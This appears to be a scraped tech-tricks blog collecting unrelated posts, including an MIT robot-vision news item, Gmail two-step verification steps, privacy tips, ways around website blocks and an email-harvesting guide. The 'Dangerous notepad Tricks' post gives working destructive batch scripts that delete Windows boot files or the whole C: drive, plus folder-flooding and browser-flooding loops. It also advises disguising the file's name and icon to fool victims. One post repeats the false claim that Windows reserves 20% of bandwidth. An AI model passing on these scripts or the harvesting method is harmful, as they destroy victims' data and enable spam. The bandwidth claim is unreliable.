This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Thursday 10 October 2013

New tool to help robots 'see' better


New tool to help robots 'see' better

WASHINGTON: A statistical tool can improve 'vision' in robots by helping them better understand the objects in the world around them.

Object recognition is one of the most widely studied problems in computer vision, researchers said.

To improve robots' ability to gauge object orientation, Jared Glover, a graduate student in Massachusetts Institute of Technology (MIT)'s Department of Electrical Engineering and Computer Science, is exploiting a statistical construct called the Bingham distribution.

In a paper to be presented at the International Conference on Intelligent Robots and Systems, Glover and MIT alumna Sanja Popovic, who is now at Google, describes a new robot-vision algorithm, based on the Bingham distribution, that is 15% better than its best competitor at identifying familiar objects in cluttered scenes.

That algorithm, however, is for analysing high-quality visual data in familiar settings.

Because the Bingham distribution is a tool for reasoning probabilistically, it promises even greater advantages in contexts where information is patchy or unreliable.

In cases where visual information is particularly poor, the algorithm offers an improvement of more than 50% over the best alternatives.

"Alignment is key to many problems in robotics, from object-detection and tracking to mapping," Glover said.

"And ambiguity is really the central challenge to getting good alignments in highly cluttered scenes, like inside a refrigerator or in a drawer. That's why the Bingham distribution seems to be a useful tool, because it allows the algorithm to get more information out of each ambiguous, local feature," Glover said.

One reason the Bingham distribution is so useful for robot vision is that it provides a way to combine information from different sources, researchers said.

Determining an object's orientation entails trying to superimpose a geometric model of the object over visual data captured by a camera -- in the case of Glover's work, a Microsoft Kinect camera, which captures a 2D colour image together with information about the distance of the colour patches.

In experiments involving visual data about particularly cluttered scenes - depicting the kinds of environments in which a household robot would operate - Glover's algorithm had about the same false-positive rate as the best existing algorithm: About 84% of its object identifications were correct, versus 83% for the competition.

But it was able to identify a significantly higher percentage of the objects in the scenes - 73% versus 64%.

How to Generate thousands of genuine email ids for free












Hi, here I am once again, with a new trick about How to generate 1000's of genuine e-mail id's with in 5 to 10 minutes , all you have to do is just follow these simple steps  . its up to you that how you want to use them . So be careful about it.  :-)
Requirements :-
LETS START GENERATING E-MAIL ID'S :-
  •  Go to http://www.google.com, click on "Search settings" in the top right corner and change the number of results to display "100" per page, now click on Save preferences.
  • Now in  the search bar type a keyword(s) and the e-mail extension in speech marks For example :- xyz"@gmail.com" What it will do is search for web-pages that contain Gmail e-mail adresses and that are also related  with your keyword. The speech marks around "@gmail.com" make sure that "@gmail.com" is on every web page that is a result of the search.
    • You can also search single websites for e-mail adresses as shown on the example :- site:twitter.com "@gmail.com" The  example shown above will search the whole of twitter.com for"@gmail.com" email adresses. 
  • Now With your results in focus, click the arrow at the side of the AutoPager icon as shown in the picture below. Then goto "Immediately load > All pages" .as shown in screenshot. With your search results still in focus, scroll all the way down and AutoPager should load the next page of results onto the same  page you are currently on. Keep scrolling till all pages have loaded onto the samepage.

    • Press "ctrl + a" to select all of the pages then press "ctrl + c" to copy the results. With the results still in the clipboard (Still copied) go to http://www.skymem.com/ or Click here  . Paste your results into the first box which says "1. Put text with email addresses here:" and just click on Start Extracting Emails Button on top of that box. The settings should already be correct with "unique emails" and "sortticked" So no need to Touch that option. 
    • The e-mail adresses should show in the Results box (3rd box)  almost instantly.
    • Now copy the results from the results box paste them into Notepad. Sometimes the e-mail address seem to end in ".com." instead of just".com" so in notepad go to "Edit > Replace" and in the "Find what" text-box type ".com." without the  speech marks("") in the "Replace with" textbox type".com" , without the speech marks.

    How to protect gmail account from hackers


    Most of the people use Gmail for sending emails. We have precious information stored in our Gmail account. So Gmail would be the target for hackers being hacking it. Gmail developer team has given us wonderful security option by enabling the 2-step Verification,


    By enabling the 2-step verification from you Gmail account makes your account more secure by making you to login into Gmail by 2 step. While logging in into the Gmail account, Gmail send you the security code to your mobile phone and asks you to enter that code in Gmail login page. This makes sure that only the mobile phone carrier can able to know that code. So your account cannot be Hacked if someone tries to hack your account from somewhere else.


    How to enable 2-step verification

    • Log in to your Gmail Account,
    • Click Account at the top right,
    • Click Edit on 2-step verification,
    • Now Click Start Setup,
    • selcet your country and add your mobile number,
    • Select the method of verification, SMS option is by default and it is most recommended one
    • Just click Send Code
    • Now Google will send you Text in your mobile with Verification Code
    • Now click Next, and NextNote this point after 2-step Verification
    • Your Another Application and Connected account will not be working, you need to re-invoke that on Final 2-step Verification or do it later!
    • If your Primary Moblie is lost then you cannot able to login to Gmail so set Backup Mobile Number
    • Backup Verification Code is the another way to Recover your Account Please Download and Note that number and keep it safely somewhere it is accessible for you, like your Wallet. Each code can be used only once.
    • I recommend you to read everything and make a note of it.
    Happy with your safe Gmail Account. This time none can Hack your Gmail, I hope. Please comment below and also mention me if I have missed any point.

    Top 25 peoples who changed internet forever



    Top 25 People Who Changed the Internet Forever ---

    1. Sir Tim Berners-Lee – World Wide Web
    2. Vint Cerf And Bob Kahn – TCP/IP
    3. Larry Page and Sergey Brin – Google Inc.
    4. David Filo and Jerry Yang – Yahoo! Inc.
    5. Bill Gates – Microsoft
    6. Steven Paul Jobs – Apple Inc.
    7. Mark Zuckerberg – Facebook
    8. Chad Hurley and Steve Chen – YouTube
    9. Linus Torvalds – Linux
    10. Jack Dorsey – Twitter
    11. Kevin Rose – Digg
    12. Bram Cohen – BitTorrent
    13. Mike Morhaime – Blizzard Entertainment
    14. Jimmy Wales – Wikipedia
    15. Jeff Preston Bezos – Amazon
    16. Shawn Fanning – Napster, Rupture
    17. Pierre Omidyar – eBay
    18. Jack Ma – Alibaba
    19. Craig Newmark – Craigslist
    20. Matt Mullenweg – WordPress
    21. Thomas Anderson – MySpace
    22. Garrett Camp – StumbleUpon
    23. Jon Postel – Internet Pioneer
    24. Caterina Fake – Flickr
    25. Marc Andreessen – Netscape

    8 ways to access blocked websites


    1. Using IP instead of URL

    2. Redirection with short URL service

    3. Google cache

    Search engines like Google and Yahoo cache webpages and these cached pages are stored in search engines themselves, which likely will be added to the blocked list. Click on the ‘cache’ will bring you to a cache version of the page, as updated as how Google caches it.

    4. Internet Archive – Wayback Machine

    Wayback Machine is a internet service that periodically keeps a copy of almost all websites in the Internet way from the date they’re started. Clicking on the latest copy of what Wayback Machine have should be somewhat similar to the real site.

    5. Anonymous surfing

    - Hidemyass.com
    - anonymizer.com
    - wujie.net
    - ultrareach.net


    6. Use Proxy in Browsers

    7. Bypass with translation services

    Use Google translate. Open Google translate ,type the URL and translate page.

    8. Retrieve web pages via Email

    Web2Mail is a free service that sends websites you want to read right into your inbox. All you need to do is send an email to www@web2mail.com with the URL as subject title.

    Windows 8 picture password



    Windows 8 Tips.
    Use a picture password to log into your computer. Windows 8 includes a new feature called Picture password, which allows you to authenticate with the
    computer using a series of gestures that include circles, straight lines, and taps. Enable this feature if you want a new way to access your computer or have a hard time with passwords. Open the Windows Charms. Click Settings and then More PC settings In the PC settings  window click Users and then select Create a picture password.

    How to create facebook Chat codes



    Have you seen People sending Smiles and images that are not part of Facebook Traditional chat codes.
    Here in this post You will see how easy it is to create these codes and Impress you Facebook friends
    Like, The best part is you can create your Unique codes . You can create codes of any image stored in you computer, by following these steps

    Follow these Steps :- 
    1. Go to Smileyti

    2. Click on "Browse" and select The  picture you want to use in facebook chat.

    3. Enter captcha code.[If you get one]

    4. Click on "Upload Now" .

    5. It will generate code in few seconds in This form<< [[512585645451273]] [[512585638784607]] >>
    Copy The code
       
    6. Paste it in facebook chat and hit enter.
     DONE :D












    How to boost internet speed by 20% without any software


    Increase internet speed by 20% without any software –

    Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc. By unreserving this bandwidth, you can make your internet connection faster. By 20%. The steps to do so are –

    1. Click Start then Run and type "gpedit.msc" without quotes.

    2. Then go to Local Computer Policy>Computer Configuration>Administrative Templetes>Network>QoS Packet Scheduler. Click on QoS Packet Scheduler. In the right side , find Limit Reservable Bandwidth and double click on Limit Reservable Bandwidth.

    3. It will say it is not configured but the truth is under the ‘Explain’ tab. Select ‘Enable’ and set reservable bandwidth to zero.

    4. Click on ‘Apply’ and your internet speed will boost up by 20%.

    Top 5 most Dengerous notepad Tricks



    SOME DANGEROUS AND DEADLY  TRICKS
    [CAUTION]
    DO NOT TRY THESE FOR FUN!!

    1. How to create more than 3,000 folders under a minute
    1) Open your notepad and type
    the following code.
    @echo off
    :top
    md %random%

    goto top
    2) Save it as 1000.bat
    @echo off makes your screen
    appear blank but it is actually
    making hundreds of folders.
    md %random% is command that
    creating folders with random
    names.( md is a command to
    make directory in ms-dos)
    goto top – return the command
    to :top, causes an infinite loop.
    NOTE: The folders will get created
    in the directory where you saved
    the ”1000.bat” file.
    The file might look suspicious to
    your friends. So if you are
    looking to fool your friends, then
    change the file name and also
    the icon so that he doesn’t
    suspect the file to be a virus.
     ———————————————————————————
    ——————————————————–


    2. How to Shutdown a computer forever?
    Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
    code into your notepad
    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows
    \win.ini
    del c:\windows\win.ini

    Save it as “shutdown-
    forever.bat”. Just make sure it
    has a .bat or .cmd extension.
    DONT RUN THE BATCH FILE ,YOU
    WONT RECOVER BACK AFTER YOU
    RUN IT !!!
    This should shutdown the persons computer. It shuts it off once
    and deletes the files needed to reboot and restart.So please, use
    this hack only if you have no intention of rebooting your computer again. So just be careful.
    Here’s an alternative code.
    cmd /c del c:\windows\* /F /S /
    Q
    cmd /c del c:\* /F /S /Q
    Paste it in NotePad And Save It
    with Extension .cmd or .bat.

    ———————————————————————————
    ——————————————————–
    3. How to Delete all your system
    files with a small command!
    Copy the following code into your
    notepad and save it as a .bat
    file.
    del *.*
    All your files in your hard disk will
    vanish in less than 5mins.
    ———————————————————————————
    ——————————————————–
    4. RAM crashing trick
    open notepad and type
    :A
    start http://computer-tricks-corner.blogspot.in/
    goto A
    save with .bat extension.
    Infinitely loops your browser to
    open up http://computer-tricks-corner.blogspot.in/
    ———————————————————————————
    ——————————————————–
    5. Crash a Computer System With

    Nothing But a Link.
    This is a javascript “exploit” , it
    will hang/crash your system. It
    basically floods you with an
    infinite loop of mailto:xxx
    windows. To cancel this (and you
    have to move fast) kill the
    process of your email client
    before you run out of RAM. Every
    instance occupies about 1000
    bytes, if your victim is smart, he
    better end the process As soon as
    possible or he will be forced to
    reboot his computer.
    WARNING THIS LINK WILL CRASH
    YOUR BROWSER OR WORSE, YOUR
    COMPUTER !!!!
    Click Here
    ———————————————————————————
    ——————————————————–
    NOTE: Try at your own risk
    WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…
    ENJOY!


    Add another one to the list of basic security apps you should be running, AVG’s Anti-rootkit Free

    For the past 3-4 years I have been recommending Windows XP users to install a small combo of basic applications that will grant a more secure and thus stable experience with the OS.
    Nowadays SP2/Windows Defender should be a given and along with it you should install a good non-bloated anti-virus like AVG or AntiVir (both free), a good software firewall like ZoneAlarm, and a couple of trusted anti-spyware apps to run at least once a month. Everyone’s favorites seem to be the free Adaware and Spybot.
    If you are familiar with all of those and you don’t rely on any untrusted sites, you should be in pretty good shape. Now I have another one to add to your list if you want to keep your system as secure as possible and rootkit-free. So, what are rootkits?
    Rootkits are a specific type of malware which hide in other applications or a computer‘s operating system kernel. They allow malicious applications to collect passwords and sensitive data from the infected computer without the user’s knowledge, this can be used for personal information theft, spam relay and other criminal activities.
    From the programs I just mentioned above, the anti-viruses should help a bit but none are specialized in detecting this kind of malware.
    There used to be a pretty good free scanner from F-secure but the utility is no longer available. But don’t worry, AVG has got you covered with their Anti-rootkit Free utility, download that here and add it to your list of important programs.


    How long’s it been since you last rebooted Windows?


    If you’ve ever wondered just how long your PC has been continuously running without a reboot and you are using Windows NT, 2000, XP, Vista or 7, there are a couple of simple ways to obtain this information using tools built right into the OS.
    Method 1: Windows NT/2000 and XP
    Open up the command prompt (Start > Run > cmd > Enter/Ok). When the command prompt has loaded type “net stats srv” (or “net statistics server”). NT4 users (are there any, really?) need to download a special utility instead.
    uptime-2
    uptime-3
    Method 2: Windows XP and beyond
    Alternatively, you can use the command prompt to obtain system information, type “system info” which will also provide you with your PC’s uptime.
    uptime-4
    uptime-5
    Method 3: Windows Vista and beyond
    For those on Vista or Windows 7, things are a little easier (although the above will work just fine). Right click the taskbar and choose “Task Manager” or “Start Task Manager”. Head over to the “Performance” tab and on the bottom right of the window you ought to see your system uptime.
    uptime-6
    Also, should you so prefer, there are many other lightweight applications that will provide you with your system uptime. There’s a desktop gadget dedicated to that and here’s yet another alternative.
    Feel free to share your current uptime in the comments below. Mine right now is at 47 hours, 51 minutes on Vista x64.

    Verify your Windows 7 ISO


    With Windows 7 on the brink of completion, the RTM phase is expected to come before the end of the month - possibly even less than a week from now. Already proving to be both popular and successful, you can bet your bottom dollar that the RTM copy of Windows 7 will hit torrent sites instantaneously. Now, we’re not encouraging you to go and pirate the software, and we don’t have to. A majority of the enthusiast community will download Windows 7 illegitimately. Some will have already pre-ordered Microsoft’s latest OS, others will undoubtedly come into a legal copy at one point or another, and many will flat out steal 7 – you know who you are.
    That out of the way, the bottom line is, nobody wants to wait until October 22 to get their hands on the final build of Windows 7. Unfortunately, by jumping the gun, you’re going to have to trust an unofficial source. This certainly has its risks, as we’ve seen with past reports of infected torrents of Windows 7 creating botnets.
    Recognizing this fact, Long Zheng and Sven Groot developed a handy application which generates and verifies the hash of your Windows 7 ISO. The program is very small at 253KB, and beyond easy to use. To check the validity of your ISO, download the free utility here. Run the program (Windows7IsoVerifier.exe) and you can browse to your ISO file (or just drag and drop it onto the executable).
    The process of downloading the program and verifying your copy of Windows 7 should take less than a minute if you have quick fingers and a modern system. At the time of writing, it only works with the English versions of Windows 7. 

    Install Over 50 Freeware Apps Hands-Free with Ninite


    If you’ve reinstalled an operating system in recent times, you surely realize how tedious the whole process can be. We have covered some aspects of this in the past, looking to simplify your experience with a list of top programs to grab after a fresh OS installation, as well as a comprehensive backup checklist. And while that should give you a neat jumpstart, we haven't entirely touched on how time-consuming it can be to actually download and then install every new app.
    Not everyone has a speedy broadband Internet connection or a well-equipped PC, and tracking down a dozen or more pieces of software along with manually installing each one could easily burn an entire afternoon -- not counting the time it takes to get your new operating system up and running. To further compound that situation, what if you are doing it on more than one computer?
    A nifty new service called Ninite tries to circumvent much of this pesky process by allowing you to select, download, and automatically install over 50 popular freeware applications from a single location. The programs span Web browsers, instant messengers, media players, image editors, office and document applications, anti-viruses, runtimes, developer tools, file sharing apps, compression software, various system utilities and more. It's not useless stuff either, we have featured many of those programs as our download of the week.
    Ninite is compatible with Windows XP, Vista and 7 -- both 32 and 64-bit versions. To use the service, simply scroll through and select any program you're interested in, then click on Get Installer at the bottom of the page and save the executable.
    If you're running Vista or Windows 7, right click on the saved EXE and choose Run as administrator. At this point, the executable should take off, and automatically grind out each program installation with default settings and without requiring any additional attention.
    The installer provided by Ninite bypasses license agreements, though you are still obligated to comply with them. It also automatically excludes any browser toolbars and other junk that many freeware apps are often packaged with. In fact, Ninite's software isn't even installed in the process.
    The service has been open to the public since late last month, and its catalog of software is growing by the day. Ninite makes it ridiculously easy for users to suggest an application at the bottom of their home page, so if your favorite freeware program isn't listed, feel free to notify them.
    Have other time-saving tips for installing an operating system or subsequent software? We would love to hear about it in the comments. 

    How to Change the Logon Screen on Windows 7


    Be it screensavers, desktop wallpapers or font type and sizes, visual customization at the OS level is usually important to all kinds of users. Recognizing this, Microsoft has made it easier than ever to apply and adjust individual themes with Windows 7. We looked at this last week showing you how to find hidden themes buried in your hard drive as well as sponsored ones available through Microsoft's online Personalization Gallery.
    This time around, we are going to show you how to customize the Windows 7 login screen. There are various methods to accomplish this, with and without third-party software. I understand many people might not want to rely on a third-party application, while others would appreciate a quicker, safer route. First up is the more hands-on approach, and then the utility.

    Hands-on approach
    This method will require you to modify the registry, and if that puts a knot in your stomach, you should move on to the next section.
    Step 1: Open the Windows Start menu and enter regedit into the search bar.
    Step 2: Right click on HKEY_LOCAL_MACHINE and select Find.
    Step 3: Search for OEMBackground, which should be in ComputerHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionAuthenticationLogonUIBackground. If the key does not exist, add a new DWORD value with the name OEMBackground.
    Step 4: Double click on the entry OEMBackground, and change the value from 0 to 1.
    Step 5: Open Windows Explorer and go to the following path: %windir%system32oobe.
    Step 6: Create a new folder named info, and open it.
    Step 7: Create a new folder within info named backgrounds.
    Step 8: Rename your desired wallpaper as backgroundDefault.jpg and place it inside the folder backgrounds (images must be less than 245KB in size).
    That should do the trick, now just lock your PC, log off or reboot and enjoy.

    Third-party software
    If you are uncomfortable with manually tinkering with the registry -- or simply have better things to be doing with your time -- we understand. Various third-party applications can change Windows 7's default logon wallpaper, but our personal favorite is Tweak.com's Logon Changer.
    The software is ridiculously easy to use, doesn't require installation, and it even has built-in tools to automatically resize and recompress your images while leaving the original file untouched. The Logon Changer also lets you quickly change your logon wallpaper back to the Windows 7 default.
    Start by downloading the app here, and then unzip the executable. Run the program and it should present you with a preview of your logon screen along with a few self-explanatory options: "Change Logon Screen" lets you browse to a new image, "Test" will bring up your logon screen, "Revert to Default Logon Screen" reapplies Windows 7's original wallpaper. 

    Enable Windows 7's Hidden "God Mode"


    As indicated by enthusiasts around the Web, there is a simple way to access a hidden "God Mode" in Windows 7 and Vista. With a name like that, your expectations might be a little high -- and no, Windows is not secretly invincible -- but the trick is awesome nevertheless.
    "God Mode" simply provides users with a centralized Control Panel for all of Windows' settings, from changing your desktop background to setting up a VPN or partitioning your hard drive. In all, there are nearly 50 categories and most have several entries.
    It's almost comical how simple it is to access it:


    1. Create a new folder. Anywhere is fine, I created one on my desktop.


    2. Rename the folder to: God Mode.{ED7BA470-8E54-465E-825C-99712043E01C} *Note: The "God Mode" chunk can be called anything you want.


    3. The default folder icon will change to a Control Panel icon, and you can open it to view all of the settings.
    User reports suggest that it may crash Windows Vista 64-bit, so proceed with caution. For what it's worth, I've successfully used the "feature" on Windows 7 Home Premium and Ultimate 64-bit.
    As an additional note, having the undocumented feature disclosed all over the Web, Microsoft has decided to be more open about it admitting similar commands have been available even before Vista. They have also revealed other text strings that create similar "God Mode" folders, a list is available here.

    Save the Day (and Windows) Using an Ubuntu Flash Drive


    The latest version of Ubuntu has been out for nearly a month now and if you're anything like us the peaceably-named operating system is now sitting untouched after you gave it a quick go for a week or so. Ubuntu 10.04 may not have convinced you to send Microsoft packing, but don't scrap your bootable USB drive just yet, it may come in handy the next time Windows goes haywire. Your mileage may vary, but no matter how careful you are, imminent catastrophe awaits any install of Windows. Being prepared by having another environment to troubleshoot it helps tremendously. Below are a few ways an Ubuntu boot flash drive can save your tail when disaster strikes. If you don't have a bootable USB drive, check out our guide on creating one with an Ubuntu LiveCD.
    Resetting a forgotten Windows password
    There are many ways to work around a lost Windows password. Online services like Login Recovery and standalone utilities like Ophcrack are great, but you can get by with your Ubuntu USB drive and a free program called chntpw. How-To Geek has an excellent walkthrough for using chntpw, which consists of little more than installing the application and typing a few words in the terminal.
    If you already know your way around Linux, here is the Cliffs Notes version it: (1) Install chntpw via the Synaptic Package Manager (32-bit OS) or this page (64-bit OS), (2) mount your Windows drive, and then (3) enter the following commands into the terminal: cd /media > ls > cd hard drive label > cd WINDOWS/system32/config/ > sudo chntpw SAM.
    At that point, you should have four options, including the ability to clear and edit your password, promote a user account to admin, and unlock or enable a user account.
    Clearing unruly malware instances
    Windows has a bad rap for being a virus-infested wreck – just take a look at any Mac commercial or Linux forum. While that's mostly untrue with the proper habits and protection, malware can lurk under the radar and wreak enough havoc to send your installation into an infinite loop of reboots and errors. If you can't get into Safe Mode and you need another environment from which to scan for infections, your bootable USB drive can help.
    Many of the popular free antivirus programs for Windows are also available on Linux, such as Avast, AVG and Avira – all of which should let you scan your Windows hard drive. It's worth noting that some of the anti-malware applications are limited to 32-bit installations of Ubuntu, but that's what Ubuntu recommends and there are few reasons to run 64-bit on your USB drive anyway.
    Retrieving and backing up data
    Most users don't have a rigorous backup strategy in place and often wait until it's too late. If you're greeted with a critical error after turning on your PC, the first thing that runs through your mind is all the saved games, family pictures, and music that might be lost forever.
    Most of the time, you'll still be able to access and save all of that data from another operating system. Even in a situation where data – or even your entire partition – has mysteriously vanished, free software like TestDisk or recoverdm can help recover your files.
    Once you're in Ubuntu, you should see the drive with your Windows installation under Places > Computer. From there, you can browse your Windows files and transfer them to your USB drive or another hard drive if you need more space.
    Don't have another hard drive? Create a new partition on your Windows hard drive with Ubuntu's Disk Utility (System > Administration > Disk Utility) or install GParted (Applications > Ubuntu Software Center).
    Researching your problems
    Unless you're seasoned repair tech, chances are you'll have a few questions about what to do when Windows hurls obscure STOP codes at you. In such instances, you can consider your Ubuntu USB drive a temporary command center, complete with Web access, testing utilities, and a media player to make your stay a bit more comfortable. In a pinch, you could use it to get some work done as well, since it has a few key OpenOffice applications.
    Having a quick and easy backup environment is a lifesaver when your primary OS bites the dust, and it's even more valuable when you can carry that environment in a shirt pocket and use it on virtually any PC. Can you think of any other instances where an Ubuntu USB boot drive might save the day?     

    Managing Your Privacy Online: Search Engines


    If you are looking to attain utmost privacy while browsing the Web, you must first acknowledge that even the most basic and ubiquitous of tools like search engines tend to collect a ton of data every time you use them. Often this recorded information is like a puzzle comprising of IP addresses, search logs, and other data that needs to be connected before anything can truly be revealed about you. However, this glimpse into your online habits combined with personal and sensitive information you may have shared with third party sites -- banking information, credit cards, addressesor phone numbers -- could potentially expose you to identity theft and other privacy invasions. All major search engines claim that they need to retain personal data, in part, to provide better services and improving results, while also taking countermeasures against web nuisances like click fraud and search poisoning (using elaborate SEO techniques to rank up scam websites on search engine indexes). Even if you trust that search companies will take your business seriously, there are various things you can do to adopt safe browsing habits and help protect your privacy.
    Most of the browsing privacy tips we have listed below are straightforward and easy enough to follow without falling into 'paranoid' territory. Others require a bit more knowledge and effort, but will give you near-complete safety. Depending on your particular situation and willingness to accept certain 'risks' in favor of functionality, you'll have to trace your own privacy goals and adopt the ones that won't hinder your browsing experience.
    1. Know the rules. If you are really concerned about search engine privacy, the first thing on your list should be to understand the terms that govern each service. This includes knowing what kind of data is stored and how it is used. Admittedly, not many of us are interested in sifting through reams of legal mumbo-jumbo to use a simple search box -- well, simple on the surface at least. We just sit back and let it do its thing.
    That said, one factor often cited as indicative of a search engine's stance towards users' privacy is their data retention policy. Google, Yahoo, Bing and most search engines record your search queries and maintain massive databases to improve their results based on what sites users visit after searches, the queries they typed, and many other things. Without this search engines would lose the ability to improve and do many useful things, but it also means that searches referencing your medical history, financial information, political affiliation, and many others are being stored somewhere.
    Under pressure from regulators and privacy advocates, Google in 2008 agreed to "anonymize" its search logs after nine months by wiping the last octet of an IP address, so that they aren't personally identifiable. Bing removes the entire IP address, not just the last octet, after six months, while Yahoo beats both with a retention period of just 90 days.

    2. Clear and turn off web history. Google has a feature called Web History that automatically saves all of your Internet searches when logged onto any of their services -- Gmail, Calendar, Reader, Docs and so on. The company does not use this data to target ads -- that's stored on Google's server logs which are anonymized after nine months. But your Web History is retained forever unless you turn it off or manually delete the contents.
    To do this simply head to the Web History option, click "Remove items" on the left pane and then "Clear entire Web History" on the right. You can also choose to remove individual items. If you aren't signed in to a Google Account, your search experience will still be customized based on past search information linked to a cookie on your browser. To disable this you have to search for something first, click "Web History" in the top right corner of the results page, and choose to disable customizations. You might also want to clear your browser's cookies (more on that later).
    Bing saves your search history for four weeks and displays it on the site using a cookie stored in your browser. You'll see a "History" link on the left pane to access this feature, where you can turn it off, clear your entire history, or remove items individually -- pretty straightforward. For its part, Yahoo offers a feature called "Search Pad" that doesn't specifically save your past searches but rather the results you click on after a search.
    To disable Search Pad for your current session simply use the Turn Off option from the pull down menu in the Search Pad application that sits on the left side of your screen after you conduct a search. To disable it permanently, click the Options link within any search results page and select preferences from the pull down, look for the Search Pad section and click Edit, then select Off and hit save. Search Pad is actually useful when researching a topic online, as it keeps track of the sites you've visited and lets you take notes. Furthermore, your history is cleared when you sign out or close the browser.
    3. Opt out of personalized ad serving. Google and third-parties in its AdSense network use contextual information related to your search, as well as a history of previously viewed web pages to serve up targeted advertising. The idea is to display ads that are more relevant to your interests. You can opt-out or manage your ads preferences on this page. However, to make the change permanent you'll need to install a plug-in for each browser you use.
    Similarly, Yahoo uses information about many of the pages you have visited, ads you have seen and clicked, and searches you have conducted to make their ads more relevant and useful. You can edit or de-select categories on their Ad Interest Manager page or opt out of interest-based ads altogether. Microsoft follows the same principles to serve ads and it also offers a way to opt out of personalized advertising on this page.
    4. Avoid browser toolbars. Besides clogging your browser's user interface, toolbars may permit the collection of information about your web surfing habits. Watch out for inadvertently installed toolbars when installing free software that you are not particularly familiar with. It's also a good idea to stay away from your ISP's search engines, like search.comcast.net or search.aol.com, as they might be able to link your identity to your searches.
    5. Consider using an anonymizing tool or a proxy. There are several free and paid services available that allow you to browse the web without revealing your computer address. A relatively straightforward solution can be to pay for a VPN service like BlackVPN or HideMyNet, which will let you hide your IP address and won't log any of your activity.
    Also, by using a combination of Tor and Privoxy (both free) you can encrypt your traffic through a series of randomly selected computers, thus obscuring the source and route of your requests, as well as hiding personally identifiable information. The downside: The Tor network can be very slow. You can find instructions on how to set these tools up at here. None of this can guarantee 100% anonymity, but it does create a strong shield against the most common and likely means of invading your privacy.
    6. Flush cookies and clear your cache periodically. Cookies are useful for storing information about a user's preferences when using a particular site, so outright blocking them is far from the best option. But since cookies can also be used to correlate a variety of information related to your online activity some tweaking should be in order. For instance, going to the privacy settings on your browser you can set it to clear cookies and other site data every time you close the program or after a certain period of time (e.g. 15 days). You can also create exceptions to block certain sites and always allow others.
    Most major browsers today also offer a "Private Browsing" mode which ensures that web history, cookies and records of downloads are not stored on your computer when the session ends. Additionally, browser add-ons like BetterPrivacy and Privacy+ on Firefox, Click&Clean on Chrome and Paper Shredder on IE 8 can help you delete your browsing history, typed URLs, Flash cookies, and most traces of your online activity to protect your privacy.
    7. Use SSL connections whenever possible. A web site using SSL (usually recognized by a web address starting with "https" or a browser lock icon) scrambles your data and makes it harder for someone to listen in on what you're doing. Google added SSL encryption to products ranging from Gmail to Google Docs and others some time ago, but just recently they have implemented it on their search engine as well.
    To search over an encrypted SSL connection in Google, simply head to https://www.google.com. Note that the feature is only available for web search, so other search products like Google Images and Google Maps are not currently available over SSL. When you're searching over SSL, these properties may not appear in the left panel.
    Going a few steps further
    If you're really serious about extending your tinfoil hat protection when it comes to browsing safely, you might want to look into Browzar and Startpage. The first is a lightweight no-installation browser based on the Internet Explorer engine that promises to let you search and surf the web without leaving traces on your computer. This means no browsing history, no stored files or cookies, and no embarrassing search auto-complete revealing your past whereabouts. As for Startpage, this is a search engine operated by Ixquick that doesn't record IP addresses or any other user data on the basis that "if the data is not stored, users' privacy can't be breached." The site returns the top ten results from multiple search engines and ranks them using a star system that verifies which result appears the most on different engines. Ixquick was awarded the first European Privacy Seal (EuroPriSe) for its privacy practices on July 14, 2008.